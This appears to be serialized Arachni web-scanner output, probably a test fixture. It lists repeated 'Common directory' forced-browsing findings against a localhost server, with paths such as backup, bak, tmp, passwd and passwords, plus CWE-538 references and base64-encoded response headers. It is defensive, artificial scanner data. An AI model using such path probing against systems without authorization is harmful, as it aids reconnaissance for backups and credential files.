mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/backup/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/backup/ injected: backup id: backup elem: path remarks: {} method: '' response: backup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/prv/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/prv/ injected: prv id: prv elem: path remarks: {} method: '' response: prv headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/dat/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/dat/ injected: dat id: dat elem: path remarks: :stuff: - Blah - Blah2 method: '' response: dat headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/help/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/help/ injected: help id: help elem: path remarks: {} method: '' response: help headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/bak/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/bak/ injected: bak id: bak elem: path remarks: :stuff: - Blah - Blah2 method: '' response: bak headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/old/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/old/ injected: old id: old elem: path remarks: {} method: '' response: old headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/include/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/include/ injected: include id: include elem: path remarks: {} method: '' response: include headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/data/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/data/ injected: data id: data elem: path remarks: {} method: '' response: data headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/test/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/test/ injected: test id: test elem: path remarks: {} method: '' response: test headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/tmp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/tmp/ injected: tmp id: tmp elem: path remarks: {} method: '' response: tmp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/save/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/save/ injected: save id: save elem: path remarks: {} method: '' response: save headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/archive/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/archive/ injected: archive id: archive elem: path remarks: {} method: '' response: archive headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/marketing/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/marketing/ injected: marketing id: marketing elem: path remarks: {} method: '' response: marketing headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/pass/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/pass/ injected: pass id: pass elem: path remarks: {} method: '' response: pass headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/passwd/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/passwd/ injected: passwd id: passwd elem: path remarks: {} method: '' response: passwd headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/passwords/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/passwords/ injected: passwords id: passwords elem: path remarks: {} method: '' response: passwords headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
